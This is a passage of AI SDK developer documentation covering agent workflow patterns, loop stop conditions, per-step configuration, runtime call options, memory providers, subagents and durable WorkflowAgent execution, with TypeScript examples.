    { ...securityReview.output, type: 'security' },
    { ...performanceReview.output, type: 'performance' },
    { ...maintainabilityReview.output, type: 'maintainability' },
  ];

  // Aggregate results using another model instance
  const { text: summary } = await generateText({
    model,
    system: 'You are a technical lead summarizing multiple code reviews.',
    prompt: `Synthesize these code review results into a concise summary with key actions:
    ${JSON.stringify(reviews, null, 2)}`,
  });

  return { reviews, summary };
}

Orchestrator-Worker

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

async function implementFeature(featureRequest: string) {
  // Orchestrator: Plan the implementation
  const { output: implementationPlan } = await generateText({
    model: __MODEL__,
    output: Output.object({
      schema: z.object({
        files: z.array(
          z.object({
            purpose: z.string(),
            filePath: z.string(),
            changeType: z.enum(['create', 'modify', 'delete']),
          }),
        ),
        estimatedComplexity: z.enum(['low', 'medium', 'high']),
      }),
    }),
    system:
      'You are a senior software architect planning feature implementations.',
    prompt: `Analyze this feature request and create an implementation plan:
    ${featureRequest}`,
  });

  // Workers: Execute the planned changes
  const fileChanges = await Promise.all(
    implementationPlan.files.map(async file => {
      // Each worker is specialized for the type of change
      const workerSystemPrompt = {
        create:
          'You are an expert at implementing new files following best practices and project patterns.',
        modify:
          'You are an expert at modifying existing code while maintaining consistency and avoiding regressions.',
        delete:
          'You are an expert at safely removing code while ensuring no breaking changes.',
      }[file.changeType];

      const { output: change } = await generateText({
        model: __MODEL__,
        output: Output.object({
          schema: z.object({
            explanation: z.string(),
            code: z.string(),
          }),
        }),
        system: workerSystemPrompt,
        prompt: `Implement the changes for ${file.filePath} to support:
        ${file.purpose}

        Consider the overall feature context:
        ${featureRequest}`,
      });

      return {
        file,
        implementation: change,
      };
    }),
  );

  return {
    plan: implementationPlan,
    changes: fileChanges,
  };
}

Evaluator-Optimizer

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

async function translateWithFeedback(text: string, targetLanguage: string) {
  let currentTranslation = '';
  let iterations = 0;
  const MAX_ITERATIONS = 3;

  // Initial translation
  const { text: translation } = await generateText({
    model: __MODEL__,
    system: 'You are an expert literary translator.',
    prompt: `Translate this text to ${targetLanguage}, preserving tone and cultural nuances:
    ${text}`,
  });

  currentTranslation = translation;

  // Evaluation-optimization loop
  while (iterations < MAX_ITERATIONS) {
    // Evaluate current translation
    const { output: evaluation } = await generateText({
      model: __MODEL__,
      output: Output.object({
        schema: z.object({
          qualityScore: z.number().min(1).max(10),
          preservesTone: z.boolean(),
          preservesNuance: z.boolean(),
          culturallyAccurate: z.boolean(),
          specificIssues: z.array(z.string()),
          improvementSuggestions: z.array(z.string()),
        }),
      }),
      system: 'You are an expert in evaluating literary translations.',
      prompt: `Evaluate this translation:

      Original: ${text}
      Translation: ${currentTranslation}

      Consider:
      1. Overall quality
      2. Preservation of tone
      3. Preservation of nuance
      4. Cultural accuracy`,
    });

    // Check if quality meets threshold
    if (
      evaluation.qualityScore >= 8 &&
      evaluation.preservesTone &&
      evaluation.preservesNuance &&
      evaluation.culturallyAccurate
    ) {
      break;
    }

    // Generate improved translation based on feedback
    const { text: improvedTranslation } = await generateText({
      model: __MODEL__,
      system: 'You are an expert literary translator.',
      prompt: `Improve this translation based on the following feedback:
      ${evaluation.specificIssues.join('\n')}
      ${evaluation.improvementSuggestions.join('\n')}

      Original: ${text}
      Current Translation: ${currentTranslation}`,
    });

    currentTranslation = improvedTranslation;
    iterations++;
  }

  return {
    finalTranslation: currentTranslation,
    iterationsRequired: iterations,
  };
}

title: Loop Control description: Control agent execution with built-in loop management using stopWhen and prepareStep

Loop Control

You can control both the execution flow and the settings at each step of the agent loop. The loop continues until:

A finish reasoning other than tool-calls is returned, or
A tool that is invoked does not have an execute function, or
A tool call needs approval, or
A stop condition is met

Stop Conditions

The stopWhen parameter controls when to stop execution when there are tool results in the last step. By default, agents stop after 20 steps using isStepCount(20). This default is a safety measure to prevent runaway loops that could result in excessive API calls and costs.

When you provide stopWhen, the agent continues executing after tool calls until a stopping condition is met. When the condition is an array, execution stops when any of the conditions are met.

Use Built-in Conditions

The AI SDK provides several built-in stopping conditions:

isStepCount(count) — stops after a specified number of steps
hasToolCall(...toolNames) — stops when any of the specified tools is called
isLoopFinished() — never triggers, letting the loop run until the agent is naturally finished

Run Up to a Maximum Number of Steps

import { ToolLoopAgent, isStepCount } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    // your tools
  },
  stopWhen: isStepCount(50), // Increasing the default of 20 to 50.
});

const result = await agent.generate({
  prompt: 'Analyze this dataset and create a summary report',
});

Run Until Finished

If you want the agent to run until the model naturally stops making tool calls, use isLoopFinished(). This removes the default step limit:

import { ToolLoopAgent, isLoopFinished } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    // your tools
  },
  stopWhen: isLoopFinished(), // No maximum step limit.
});

const result = await agent.generate({
  prompt: 'Analyze this dataset and create a summary report',
});

Combine Multiple Conditions

Combine multiple stopping conditions. The loop stops when it meets any condition:

import { ToolLoopAgent, isStepCount, hasToolCall } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    // your tools
  },
  stopWhen: [
    isStepCount(20), // Maximum 20 steps
    hasToolCall('someTool', 'done'), // Stop after calling either tool
  ],
});

const result = await agent.generate({
  prompt: 'Research and analyze the topic',
});

Create Custom Conditions

Build custom stopping conditions for specific requirements:

import { ToolLoopAgent, StopCondition, ToolSet } from 'ai';
__PROVIDER_IMPORT__;

const tools = {
  // your tools
} satisfies ToolSet;

const hasAnswer: StopCondition<typeof tools> = ({ steps }) => {
  // Stop when the model generates text containing "ANSWER:"
  return steps.some(step => step.text?.includes('ANSWER:')) ?? false;
};

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools,
  stopWhen: hasAnswer,
});

const result = await agent.generate({
  prompt: 'Find the answer and respond with "ANSWER: [your answer]"',
});

Custom conditions receive step information across all steps:

const budgetExceeded: StopCondition<typeof tools> = ({ steps }) => {
  const totalUsage = steps.reduce(
    (acc, step) => ({
      inputTokens: acc.inputTokens + (step.usage?.inputTokens ?? 0),
      outputTokens: acc.outputTokens + (step.usage?.outputTokens ?? 0),
    }),
    { inputTokens: 0, outputTokens: 0 },
  );

  const costEstimate =
    (totalUsage.inputTokens * 0.01 + totalUsage.outputTokens * 0.03) / 1000;
  return costEstimate > 0.5; // Stop if cost exceeds $0.50
};

Prepare Step

Dynamic Model Selection

Switch models based on step requirements:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: 'openai/gpt-4o-mini', // Default model
  tools: {
    // your tools
  },
  prepareStep: async ({ stepNumber, messages }) => {
    // Use a stronger model for complex reasoning after initial steps
    if (stepNumber > 2 && messages.length > 10) {
      return {
        model: __MODEL__,
      };
    }
    // Continue with default settings
    return {};
  },
});

const result = await agent.generate({
  prompt: '...',
});

Context Management

Manage growing conversation history in long-running loops:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    // your tools
  },
  prepareStep: async ({ messages }) => {
    // Keep only recent messages to stay within context limits
    if (messages.length > 20) {
      return {
        messages: [
          messages[0], // Keep system instructions
          ...messages.slice(-10), // Keep last 10 messages
        ],
      };
    }
    return {};
  },
});

const result = await agent.generate({
  prompt: '...',
});

Tool Selection

Control which tools are available at each step:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    search: searchTool,
    analyze: analyzeTool,
    summarize: summarizeTool,
  },
  prepareStep: async ({ stepNumber, steps }) => {
    // Search phase (steps 0-2)
    if (stepNumber <= 2) {
      return {
        activeTools: ['search'],
        toolChoice: 'required',
      };
    }

    // Analysis phase (steps 3-5)
    if (stepNumber <= 5) {
      return {
        activeTools: ['analyze'],
      };
    }

    // Summary phase (step 6+)
    return {
      activeTools: ['summarize'],
      toolChoice: 'required',
    };
  },
});

const result = await agent.generate({
  prompt: '...',
});

You can also force a specific tool to be used:

prepareStep: async ({ stepNumber }) => {
  if (stepNumber === 0) {
    // Force the search tool to be used first
    return {
      toolChoice: { type: 'tool', toolName: 'search' },
    };
  }

  if (stepNumber === 5) {
    // Force the summarize tool after analysis
    return {
      toolChoice: { type: 'tool', toolName: 'summarize' },
    };
  }

  return {};
};

Message Modification

Transform messages before sending them to the model:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    // your tools
  },
  prepareStep: async ({ messages, stepNumber }) => {
    // Summarize tool results to reduce token usage
    const processedMessages = messages.map(msg => {
      if (msg.role === 'tool' && msg.content.length > 1000) {
        return {
          ...msg,
          content: summarizeToolResult(msg.content),
        };
      }
      return msg;
    });

    return { messages: processedMessages };
  },
});

const result = await agent.generate({
  prompt: '...',
});

Access Step Information

Both stopWhen and prepareStep receive detailed information about the current execution:

prepareStep: async ({
  model, // Current model configuration
  stepNumber, // Current step number (0-indexed)
  steps, // All previous steps with their results
  messages, // Messages to be sent to the model
}) => {
  // Access previous tool calls and results
  const previousToolCalls = steps.flatMap(step => step.toolCalls);
  const previousResults = steps.flatMap(step => step.toolResults);

  // Make decisions based on execution history
  if (previousToolCalls.some(call => call.toolName === 'dataAnalysis')) {
    return {
      toolChoice: { type: 'tool', toolName: 'reportGenerator' },
    };
  }

  return {};
},

Forced Tool Calling

import { ToolLoopAgent, tool } from 'ai';
import { z } from 'zod';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    search: searchTool,
    analyze: analyzeTool,
    done: tool({
      description: 'Signal that you have finished your work',
      inputSchema: z.object({
        answer: z.string().describe('The final answer'),
      }),
      // No execute function - stops the agent when called
    }),
  },
  toolChoice: 'required', // Force tool calls at every step
});

const result = await agent.generate({
  prompt: 'Research and analyze this topic, then provide your answer.',
});

// extract answer from done tool call
const toolCall = result.staticToolCalls[0]; // tool call from final step
if (toolCall?.toolName === 'done') {
  console.log(toolCall.input.answer);
}

Key aspects of this pattern:

toolChoice: 'required': Forces the model to call a tool at every step instead of generating text directly. This ensures the agent follows a structured workflow.
done tool without execute: A tool that has no execute function acts as a termination signal. When the agent calls this tool, the loop stops because there's no function to execute.
Accessing results: The final answer is available in result.staticToolCalls, which contains tool calls that weren't executed.

This pattern is useful when you want the agent to always use specific tools for operations (like code execution or data retrieval) rather than attempting to answer directly.

Manual Loop Control

Implementing a Manual Loop

Build your own agent loop when you need full control over execution:

import { generateText, ModelMessage } from 'ai';
__PROVIDER_IMPORT__;

const messages: ModelMessage[] = [{ role: 'user', content: '...' }];

let step = 0;
const maxSteps = 10;

while (step < maxSteps) {
  const result = await generateText({
    model: __MODEL__,
    messages,
    tools: {
      // your tools here
    },
  });

  messages.push(...result.response.messages);

  if (result.text) {
    break; // Stop when model generates text
  }

  step++;
}

This manual approach gives you complete control over:

Message history management
Step-by-step decision making
Custom stopping conditions
Dynamic tool and model selection
Error handling and recovery

Learn more about manual agent loops in the cookbook.

title: Configuring Call Options description: Pass type-safe runtime inputs to dynamically configure agent behavior.

Configuring Call Options

Call options allow you to pass type-safe structured inputs to your agent. Use them to dynamically modify any agent setting based on the specific request.

Why Use Call Options?

When you need agent behavior to change based on runtime inputs:

Add dynamic context - Inject retrieved documents, user preferences, or session data into prompts
Select models dynamically - Choose faster or more capable models based on request complexity
Configure tools per request - Pass user location to search tools or adjust tool behavior
Customize provider options - Set reasoning effort, temperature, or other provider-specific settings

Without call options, you'd need to create multiple agents or handle configuration logic outside the agent.

How It Works

Define call options in three steps:

Define the schema - Specify what inputs you accept using callOptionsSchema
Configure with prepareCall - Use those inputs to modify agent settings
Pass options at runtime - Provide the options when calling generate() or stream()

Basic Example

Add user context to your agent's prompt at runtime:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const supportAgent = new ToolLoopAgent({
  model: __MODEL__,
  callOptionsSchema: z.object({
    userId: z.string(),
    accountType: z.enum(['free', 'pro', 'enterprise']),
  }),
  instructions: 'You are a helpful customer support agent.',
  prepareCall: ({ options, ...settings }) => ({
    ...settings,
    instructions:
      settings.instructions +
      `\nUser context:
- Account type: ${options.accountType}
- User ID: ${options.userId}

Adjust your response based on the user's account level.`,
  }),
});

// Call the agent with specific user context
const result = await supportAgent.generate({
  prompt: 'How do I upgrade my account?',
  options: {
    userId: 'user_123',
    accountType: 'free',
  },
});

The options parameter is now required and type-checked. If you don't provide it or pass incorrect types, TypeScript will error.

Modifying Agent Settings

Use prepareCall to modify any agent setting. Return only the settings you want to change.

Dynamic Model Selection

Choose models based on request characteristics:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const agent = new ToolLoopAgent({
  model: __MODEL__, // Default model
  callOptionsSchema: z.object({
    complexity: z.enum(['simple', 'complex']),
  }),
  prepareCall: ({ options, ...settings }) => ({
    ...settings,
    model:
      options.complexity === 'simple' ? 'openai/gpt-4o-mini' : 'openai/o1-mini',
  }),
});

// Use faster model for simple queries
await agent.generate({
  prompt: 'What is 2+2?',
  options: { complexity: 'simple' },
});

// Use more capable model for complex reasoning
await agent.generate({
  prompt: 'Explain quantum entanglement',
  options: { complexity: 'complex' },
});

Dynamic Tool Configuration

Configure tools based on runtime inputs:

import { openai } from '@ai-sdk/openai';
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const newsAgent = new ToolLoopAgent({
  model: __MODEL__,
  callOptionsSchema: z.object({
    userCity: z.string().optional(),
    userRegion: z.string().optional(),
  }),
  tools: {
    web_search: openai.tools.webSearch(),
  },
  prepareCall: ({ options, ...settings }) => ({
    ...settings,
    tools: {
      web_search: openai.tools.webSearch({
        searchContextSize: 'low',
        userLocation: {
          type: 'approximate',
          city: options.userCity,
          region: options.userRegion,
          country: 'US',
        },
      }),
    },
  }),
});

await newsAgent.generate({
  prompt: 'What are the top local news stories?',
  options: {
    userCity: 'San Francisco',
    userRegion: 'California',
  },
});

Provider-Specific Options

Configure provider settings dynamically:

import { OpenAILanguageModelResponsesOptions } from '@ai-sdk/openai';
import { ToolLoopAgent } from 'ai';
import { z } from 'zod';

const agent = new ToolLoopAgent({
  model: 'openai/o3',
  callOptionsSchema: z.object({
    taskDifficulty: z.enum(['low', 'medium', 'high']),
  }),
  prepareCall: ({ options, ...settings }) => ({
    ...settings,
    providerOptions: {
      openai: {
        reasoningEffort: options.taskDifficulty,
      } satisfies OpenAILanguageModelResponsesOptions,
    },
  }),
});

await agent.generate({
  prompt: 'Analyze this complex scenario...',
  options: { taskDifficulty: 'high' },
});

Advanced Patterns

Retrieval Augmented Generation (RAG)

Fetch relevant context and inject it into your prompt:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const ragAgent = new ToolLoopAgent({
  model: __MODEL__,
  callOptionsSchema: z.object({
    query: z.string(),
  }),
  prepareCall: async ({ options, ...settings }) => {
    // Fetch relevant documents (this can be async)
    const documents = await vectorSearch(options.query);

    return {
      ...settings,
      instructions: `Answer questions using the following context:

${documents.map(doc => doc.content).join('\n\n')}`,
    };
  },
});

await ragAgent.generate({
  prompt: 'What is our refund policy?',
  options: { query: 'refund policy' },
});

The prepareCall function can be async, enabling you to fetch data before configuring the agent.

Combining Multiple Modifications

Modify multiple settings together:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const agent = new ToolLoopAgent({
  model: __MODEL__,
  callOptionsSchema: z.object({
    userRole: z.enum(['admin', 'user']),
    urgency: z.enum(['low', 'high']),
  }),
  tools: {
    readDatabase: readDatabaseTool,
    writeDatabase: writeDatabaseTool,
  },
  prepareCall: ({ options, ...settings }) => ({
    ...settings,
    // Upgrade model for urgent requests
    model: options.urgency === 'high' ? __MODEL__ : settings.model,
    // Limit tools based on user role
    activeTools:
      options.userRole === 'admin'
        ? ['readDatabase', 'writeDatabase']
        : ['readDatabase'],
    // Adjust instructions
    instructions: `You are a ${options.userRole} assistant.
${options.userRole === 'admin' ? 'You have full database access.' : 'You have read-only access.'}`,
  }),
});

await agent.generate({
  prompt: 'Update the user record',
  options: {
    userRole: 'admin',
    urgency: 'high',
  },
});

Using with createAgentUIStreamResponse

Pass call options through API routes to your agent:

import { createAgentUIStreamResponse } from 'ai';
import { myAgent } from '@/ai/agents/my-agent';

export async function POST(request: Request) {
  const { messages, userId, accountType } = await request.json();

  return createAgentUIStreamResponse({
    agent: myAgent,
    messages,
    options: {
      userId,
      accountType,
    },
  });
}

Next Steps

Learn about loop control for execution management
Explore workflow patterns for complex multi-step processes

title: Memory description: Add persistent memory to your agent using provider-defined tools, memory providers, or a custom tool.

Memory

Three Approaches

You can add memory to your agent with the AI SDK in three ways, each with different tradeoffs:

Approach	Effort	Flexibility	Provider Lock-in
Provider-Defined Tools	Low	Medium	Yes
Memory Providers	Low	Low	Depends on memory provider
Custom Tool	High	High	No

Provider-Defined Tools

Anthropic Memory Tool

import { anthropic } from '@ai-sdk/anthropic';
import { ToolLoopAgent } from 'ai';

const memory = anthropic.tools.memory_20250818({
  execute: async action => {
    // `action` contains `command`, `path`, and other fields
    // depending on the command (view, create, str_replace,
    // insert, delete, rename).
    // Implement your storage backend here.
    // Return the result as a string.
  },
});

const agent = new ToolLoopAgent({
  model: 'anthropic/claude-haiku-4.5',
  tools: { memory },
});

const result = await agent.generate({
  prompt: 'Remember that my favorite editor is Neovim',
});

When to use this: you want memory with minimal implementation effort and are already using Anthropic models. The tradeoff is provider lock-in, since this tool only works with Claude.

Memory Providers

Letta

pnpm add @letta-ai/vercel-ai-sdk-provider

import { lettaCloud } from '@letta-ai/vercel-ai-sdk-provider';
import { ToolLoopAgent } from 'ai';

const agent = new ToolLoopAgent({
  model: lettaCloud(),
  providerOptions: {
    letta: {
      agent: { id: 'your-agent-id' },
    },
  },
});

const result = await agent.generate({
  prompt: 'Remember that my favorite editor is Neovim',
});

You can also use Letta's built-in memory tools alongside custom tools:

import { lettaCloud } from '@letta-ai/vercel-ai-sdk-provider';
import { ToolLoopAgent } from 'ai';

const agent = new ToolLoopAgent({
  model: lettaCloud(),
  tools: {
    core_memory_append: lettaCloud.tool('core_memory_append'),
    memory_insert: lettaCloud.tool('memory_insert'),
    memory_replace: lettaCloud.tool('memory_replace'),
  },
  providerOptions: {
    letta: {
      agent: { id: 'your-agent-id' },
    },
  },
});

const stream = agent.stream({
  prompt: 'What do you remember about me?',
});

See the Letta provider documentation for full setup and configuration.

Mem0

Mem0 adds a memory layer on top of any supported LLM provider. It automatically extracts memories from conversations, stores them, and retrieves relevant ones for future prompts.

pnpm add @mem0/vercel-ai-provider

import { createMem0 } from '@mem0/vercel-ai-provider';
import { ToolLoopAgent } from 'ai';

const mem0 = createMem0({
  provider: 'openai',
  mem0ApiKey: process.env.MEM0_API_KEY,
  apiKey: process.env.OPENAI_API_KEY,
});

const agent = new ToolLoopAgent({
  model: mem0('gpt-4.1', { user_id: 'user-123' }),
});

const { text } = await agent.generate({
  prompt: 'Remember that my favorite editor is Neovim',
});

Mem0 works across multiple LLM providers (OpenAI, Anthropic, Google, Groq, Cohere). You can also manage memories explicitly:

import { addMemories, retrieveMemories } from '@mem0/vercel-ai-provider';

await addMemories(messages, { user_id: 'user-123' });
const context = await retrieveMemories(prompt, { user_id: 'user-123' });

See the Mem0 provider documentation for full setup and configuration.

Supermemory

pnpm add @supermemory/tools

__PROVIDER_IMPORT__;
import { supermemoryTools } from '@supermemory/tools/ai-sdk';
import { ToolLoopAgent } from 'ai';

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: supermemoryTools(process.env.SUPERMEMORY_API_KEY!),
});

const result = await agent.generate({
  prompt: 'Remember that my favorite editor is Neovim',
});

Supermemory works with any AI SDK provider. The tools give the model addMemory and searchMemories operations that handle storage and retrieval.

See the Supermemory provider documentation for full setup and configuration.

Hindsight

Hindsight provides agents with persistent memory through five tools: retain, recall, reflect, getMentalModel, and getDocument. It can be self-hosted with Docker or used as a cloud service.

pnpm add @vectorize-io/hindsight-ai-sdk @vectorize-io/hindsight-client

__PROVIDER_IMPORT__;
import { HindsightClient } from '@vectorize-io/hindsight-client';
import { createHindsightTools } from '@vectorize-io/hindsight-ai-sdk';
import { ToolLoopAgent } from 'ai';
import { openai } from '@ai-sdk/openai';

const client = new HindsightClient({ baseUrl: process.env.HINDSIGHT_API_URL });

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: createHindsightTools({ client, bankId: 'user-123' }),
  instructions: 'You are a helpful assistant with long-term memory.',
});

const result = await agent.generate({
  prompt: 'Remember that my favorite editor is Neovim',
});

See the Hindsight provider documentation for full setup and configuration.

Custom Tool

There are two common patterns:

Structured actions: you define explicit operations (view, create, update, search) and handle structured input yourself. Safe by design since you control every operation.
Bash-backed: you give the model a sandboxed bash environment to compose shell commands (cat, grep, sed, echo) for flexible memory access. More powerful but requires command validation for safety.

For a full walkthrough of implementing a custom memory tool with a bash-backed interface, AST-based command validation, and filesystem persistence, see the Build a Custom Memory Tool recipe.

title: Subagents description: Delegate context-heavy tasks to specialized subagents while keeping the main agent focused.

Subagents

A subagent is an agent that a parent agent can invoke. The parent delegates work via a tool, and the subagent executes autonomously before returning a result.

How It Works

Define a subagent with its own model, instructions, and tools
Create a tool that calls it for the main agent to use
Subagent runs independently with its own context window
Return a result (optionally streaming progress to the UI)
Control what the model sees using toModelOutput to summarize

When to Use Subagents

Subagents add latency and complexity. Use them when the benefits outweigh the costs:

Use Subagents When	Avoid Subagents When
Tasks require exploring large amounts of tokens	Tasks are simple and focused
You need to parallelize independent research	Sequential processing suffices
Context would grow beyond model limits	Context stays manageable
You want to isolate tool access by capability	All tools can safely coexist

Why Use Subagents?

Offloading Context-Heavy Tasks

With subagents, you can:

Spin up a dedicated agent that uses hundreds of thousands of tokens
Have it return only a focused summary (perhaps 1,000 tokens)
Keep your main agent's context clean and coherent

The subagent does the heavy lifting while the main agent stays focused on orchestration.

Parallelizing Independent Work

Specialized Orchestration

A less common but valid pattern is using a main agent purely for orchestration, delegating to specialized subagents for different types of work. For example:

An exploration subagent with read-only tools for researching codebases
A coding subagent with file editing tools
An integration subagent with tools for a specific platform or API

This creates a clear separation of concerns, though context offloading and parallelization are the more common motivations for subagents.

Basic Subagent Without Streaming

The simplest subagent pattern requires no special machinery. Your main agent has a tool that calls another agent in its execute function:

import { ToolLoopAgent, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

// Define a subagent for research tasks
const researchSubagent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: `You are a research agent.
Summarize your findings in your final response.`,
  tools: {
    read: readFileTool, // defined elsewhere
    search: searchTool, // defined elsewhere
  },
});

// Create a tool that delegates to the subagent
const researchTool = tool({
  description: 'Research a topic or question in depth.',
  inputSchema: z.object({
    task: z.string().describe('The research task to complete'),
  }),
  execute: async ({ task }, { abortSignal }) => {
    const result = await researchSubagent.generate({
      prompt: task,
      abortSignal,
    });
    return result.text;
  },
});

// Main agent uses the research tool
const mainAgent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: 'You are a helpful assistant that can delegate research tasks.',
  tools: {
    research: researchTool,
  },
});

This works well when you don't need to show the subagent's progress in the UI. The tool call blocks until the subagent completes, then returns the final text response.

Handling Cancellation

When the user cancels a request, the abortSignal propagates to the subagent. Always pass it through to ensure cleanup:

execute: async ({ task }, { abortSignal }) => {
  const result = await researchSubagent.generate({
    prompt: task,
    abortSignal, // Cancels subagent if main request is aborted
  });
  return result.text;
},

If you abort the signal, the subagent stops executing and throws an AbortError. The main agent's tool execution fails, which stops the main loop.

To avoid errors about incomplete tool calls in subsequent messages, use convertToModelMessages with ignoreIncompleteToolCalls:

import { convertToModelMessages } from 'ai';

const modelMessages = await convertToModelMessages(messages, {
  ignoreIncompleteToolCalls: true,
});

This filters out tool calls that don't have corresponding results. Learn more in the convertToModelMessages reference.

Streaming Subagent Progress

When you want to show incremental progress as the subagent works, use preliminary tool results. This pattern uses a generator function that yields partial updates to the UI.

How Preliminary Tool Results Work

Change your execute function from a regular function to an async generator (async function*). Each yield sends a preliminary result to the frontend:

execute: async function* ({ /* input */ }) {
  // ... do work ...
  yield partialResult;
  // ... do more work ...
  yield updatedResult;
}

Building the Complete Message

Each yield replaces the previous output entirely (it does not append). This means you need a way to accumulate the subagent's response into a complete message that grows over time.

The readUIMessageStream utility handles this. It reads each chunk from the stream and builds an ever-growing UIMessage containing all parts received so far:

import { readUIMessageStream, tool } from 'ai';
import { z } from 'zod';

const researchTool = tool({
  description: 'Research a topic or question in depth.',
  inputSchema: z.object({
    task: z.string().describe('The research task to complete'),
  }),
  execute: async function* ({ task }, { abortSignal }) {
    // Start the subagent with streaming
    const result = await researchSubagent.stream({
      prompt: task,
      abortSignal,
    });

    // Each iteration yields a complete, accumulated UIMessage
    for await (const message of readUIMessageStream({
      stream: result.toUIMessageStream(),
    })) {
      yield message;
    }
  },
});

Controlling What the Model Sees

How It Works

The toModelOutput function maps the tool's output to the tokens sent to the model:

const researchTool = tool({
  description: 'Research a topic or question in depth.',
  inputSchema: z.object({
    task: z.string().describe('The research task to complete'),
  }),
  execute: async function* ({ task }, { abortSignal }) {
    const result = await researchSubagent.stream({
      prompt: task,
      abortSignal,
    });

    for await (const message of readUIMessageStream({
      stream: result.toUIMessageStream(),
    })) {
      yield message;
    }
  },
  toModelOutput: ({ output: message }) => {
    // Extract just the final text as a summary
    const lastTextPart = message?.parts.findLast(p => p.type === 'text');
    return {
      type: 'text',
      value: lastTextPart?.text ?? 'Task completed.',
    };
  },
});

With this setup:

Users see: The full subagent execution—every tool call, every intermediate step
The model sees: Just the final summary text

The subagent might use 100,000 tokens exploring and reasoning, but the main agent only consumes the summary. This keeps the main agent coherent and focused.

Write Subagent Instructions for Summarization

For toModelOutput to extract a useful summary, your subagent must produce one. Add explicit instructions like this:

const researchSubagent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: `You are a research agent. Complete the task autonomously.

IMPORTANT: When you have finished, write a clear summary of your findings as your final response.
This summary will be returned to the main agent, so include all relevant information.`,
  tools: {
    read: readFileTool,
    search: searchTool,
  },
});

Without this instruction, the subagent might not produce a comprehensive summary. It could simply say "Done", leaving toModelOutput with nothing useful to extract.

Rendering Subagents in the UI (with useChat)

To display streaming progress, check the tool part's state and preliminary flag.

Tool Part States

State	Description
`input-streaming`	Tool input being generated
`input-available`	Tool ready to execute
`output-available`	Tool produced output (check `preliminary`)
`output-error`	Tool execution failed

Detecting Streaming vs Complete

const hasOutput = part.state === 'output-available';
const isStreaming = hasOutput && part.preliminary === true;
const isComplete = hasOutput && !part.preliminary;

Type Safety for Subagent Output

Export types alongside your agents for use in UI components:

import { ToolLoopAgent, InferAgentUIMessage } from 'ai';

export const mainAgent = new ToolLoopAgent({
  // ... configuration with researchTool
});

// Export the main agent message type for the chat UI
export type MainAgentMessage = InferAgentUIMessage<typeof mainAgent>;

Render Messages and Subagent Output

This example uses the types defined above to render both the main agent's messages and the subagent's streamed output:

'use client';

import { useChat } from '@ai-sdk/react';
import type { MainAgentMessage } from '@/lib/agents';

export function Chat() {
  const { messages } = useChat<MainAgentMessage>();

  return (
    <div>
      {messages.map(message =>
        message.parts.map((part, i) => {
          switch (part.type) {
            case 'text':
              return <p key={i}>{part.text}</p>;
            case 'tool-research':
              return (
                <div>
                  {part.state !== 'input-streaming' && (
                    <div>Research: {part.input.task}</div>
                  )}
                  {part.state === 'output-available' && (
                    <div>
                      {part.output.parts.map((nestedPart, i) => {
                        switch (nestedPart.type) {
                          case 'text':
                            return <p key={i}>{nestedPart.text}</p>;
                          default:
                            return null;
                        }
                      })}
                    </div>
                  )}
                </div>
              );
            default:
              return null;
          }
        }),
      )}
    </div>
  );
}

Caveats

No Tool Approvals in Subagents

Subagent tools cannot use needsApproval. All tools must execute automatically without user confirmation.

Subagent Context is Isolated

If you need to give a subagent access to the conversation history, the messages are available in the tool's execute function alongside abortSignal:

execute: async ({ task }, { abortSignal, messages }) => {
  const result = await researchSubagent.generate({
    messages: [
      ...messages, // The main agent's conversation history
      { role: 'user', content: task }, // The specific task for this invocation
    ],
    abortSignal,
  });
  return result.text;
},

Use this sparingly since passing full history defeats some of the context isolation benefits.

Streaming Adds Complexity

The basic pattern (no streaming) is simpler to implement and debug. Only add streaming when you need to show real-time progress in the UI.

title: WorkflowAgent description: Build durable, resumable agents with the WorkflowAgent from @ai-sdk/workflow.

WorkflowAgent

The WorkflowAgent from @ai-sdk/workflow is designed for building durable, resumable agents that run inside Vercel Workflows. It provides the same agent loop as the ToolLoopAgent, but adds automatic state persistence, tool schema serialization, and built-in tool approval flows that survive workflow step boundaries.

Why Durable Agents?

A standard ToolLoopAgent runs entirely in memory — if the process crashes, all progress is lost. For production agents that make multiple tool calls, this creates problems:

Statefulness — Long-running agent loops need to persist state across process boundaries
Resumability — If a step fails, you want to retry from the last checkpoint, not restart from scratch
Human-in-the-loop — Tools that require user approval need to pause the agent and resume later
Observability — Each tool call runs as a discrete workflow step, visible in dashboards

WorkflowAgent solves these by running inside a Vercel Workflow, where each tool execution is a durable step with automatic retries.

When to Use WorkflowAgent vs ToolLoopAgent

	ToolLoopAgent	WorkflowAgent
Package	`ai`	`@ai-sdk/workflow`
Runtime	In-memory	Vercel Workflow
Durability	Lost on crash	Survives restarts
Tool retries	Manual	Automatic (via workflow steps)
Human approval	Built-in	Built-in + survives suspension
`generate()` method	Available	Not available
`stream()` method	Available	Primary API
